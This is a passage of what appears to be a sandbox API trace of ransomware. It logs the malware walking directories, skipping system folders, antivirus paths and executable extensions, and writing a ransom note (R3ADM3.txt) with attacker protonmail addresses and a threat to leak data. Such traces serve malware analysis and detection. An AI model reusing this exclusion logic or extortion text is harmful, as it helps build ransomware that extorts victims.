(lpFirst="Users", lpSrch="thumb") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="$Recycle.Bin") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="System Volume Information") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="Boot") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="Windows") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="Trend Micro") returned 0x0 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e28 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e50 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e78 [0134.796] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e28 | out: hHeap=0xea0000) returned 1 [0134.796] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0134.796] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0134.796] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0134.796] StrStrIW (lpFirst="Windows", lpSrch="tmp") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="winnt") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="temp") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="thumb") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="$Recycle.Bin") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="System Volume Information") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="Boot") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="Windows") returned="Windows" [0134.797] StrStrIW (lpFirst="Windows", lpSrch=".UAKXC") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch=".exe") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch=".dll") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch=".lnk") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch=".sys") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch=".msi") returned 0x0 [0134.797] StrStrIW (lpFirst="Windows", lpSrch="R3ADM3.txt") returned 0x0 [0134.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e28 [0134.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ea0 [0134.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ec8 [0134.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ef0 [0134.797] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ea0 | out: hHeap=0xea0000) returned 1 [0134.797] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e28 | out: hHeap=0xea0000) returned 1 [0134.797] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0134.797] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a50 | out: hHeap=0xea0000) returned 1 [0134.797] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.798] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0134.798] Sleep (dwMilliseconds=0x32) [0135.083] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3008 [0135.083] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3030 [0135.083] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0135.083] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3030 | out: hHeap=0xea0000) returned 1 [0135.083] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3030 [0135.083] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3080 [0135.083] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee30a8 [0135.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee30d0 [0135.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc4b0 [0135.084] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee30d0 | out: hHeap=0xea0000) returned 1 [0135.084] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee30a8 | out: hHeap=0xea0000) returned 1 [0135.084] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3080 | out: hHeap=0xea0000) returned 1 [0135.084] CreateFileW (lpFileName="C:\\Config.Msi\\R3ADM3.txt" (normalized: "c:\\config.msi\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0135.089] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0135.089] WriteFile (in: hFile=0x1cc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0135.090] CloseHandle (hObject=0x1cc) returned 1 [0135.091] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc4b0 | out: hHeap=0xea0000) returned 1 [0135.091] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3030 | out: hHeap=0xea0000) returned 1 [0135.091] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5721b730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5721b730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0135.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.091] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5721b730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5721b730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0135.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.092] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5721b730, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5721b730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5721b730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0135.092] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0135.092] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0135.092] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0135.092] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5721b730, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5721b730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5721b730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0135.092] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec87d0 | out: hHeap=0xea0000) returned 1 [0135.092] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8910 | out: hHeap=0xea0000) returned 1 [0135.092] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0135.092] Sleep (dwMilliseconds=0x32) [0135.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0135.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3008 | out: hHeap=0xea0000) returned 1 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3008 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3260 [0135.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3288 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3210 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3120 [0135.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0135.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3120 | out: hHeap=0xea0000) returned 1 [0135.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3210 | out: hHeap=0xea0000) returned 1 [0135.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3288 | out: hHeap=0xea0000) returned 1 [0135.609] CreateFileW (lpFileName="C:\\MSOCache\\R3ADM3.txt" (normalized: "c:\\msocache\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0135.610] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0135.610] WriteFile (in: hFile=0x248, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0135.611] CloseHandle (hObject=0x248) returned 1 [0135.611] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0135.611] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0135.611] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x572b3cb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x572b3cb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0135.611] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.611] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x572b3cb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x572b3cb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0135.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.611] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0135.612] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0135.612] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="tmp") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="winnt") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="temp") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="thumb") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="$Recycle.Bin") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="$RECYCLE.BIN") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="System Volume Information") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="Boot") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="Windows") returned 0x0 [0135.612] StrStrIW (lpFirst="All Users", lpSrch="Trend Micro") returned 0x0 [0135.612] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0135.612] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3288 [0135.612] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3210 [0135.612] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0135.612] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3210 | out: hHeap=0xea0000) returned 1 [0135.612] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3288 | out: hHeap=0xea0000) returned 1 [0135.612] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0135.612] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0135.612] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0135.612] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0135.612] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x572b3cb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x572b3cb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x572d9e10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0135.612] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0135.612] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0135.612] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0135.613] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x572b3cb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x572b3cb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x572d9e10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0135.613] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2bf8 | out: hHeap=0xea0000) returned 1 [0135.613] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0135.613] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0135.613] Sleep (dwMilliseconds=0x32) [0136.044] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3260 | out: hHeap=0xea0000) returned 1 [0136.044] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3008 | out: hHeap=0xea0000) returned 1 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3008 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3260 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec5a50 [0136.044] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3260 | out: hHeap=0xea0000) returned 1 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3260 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66f0 [0136.044] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0136.044] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66f0 | out: hHeap=0xea0000) returned 1 [0136.044] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0136.044] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0136.044] CreateFileW (lpFileName="C:\\PerfLogs\\R3ADM3.txt" (normalized: "c:\\perflogs\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c [0136.045] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0136.045] WriteFile (in: hFile=0x29c, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0136.046] CloseHandle (hObject=0x29c) returned 1 [0136.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0136.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3260 | out: hHeap=0xea0000) returned 1 [0136.046] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57372390, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57372390, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0136.047] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.047] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57372390, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57372390, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.047] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0136.047] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.047] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0136.047] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0136.047] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="tmp") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="winnt") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="temp") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="thumb") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="$Recycle.Bin") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="System Volume Information") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="Boot") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="Windows") returned 0x0 [0136.047] StrStrIW (lpFirst="Admin", lpSrch="Trend Micro") returned 0x0 [0136.047] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0136.047] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0136.047] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0136.047] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0136.047] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0136.047] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0136.047] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0136.047] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0136.047] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57372390, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57372390, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57372390, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0136.048] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0136.048] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0136.048] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0136.048] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57372390, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57372390, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57372390, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 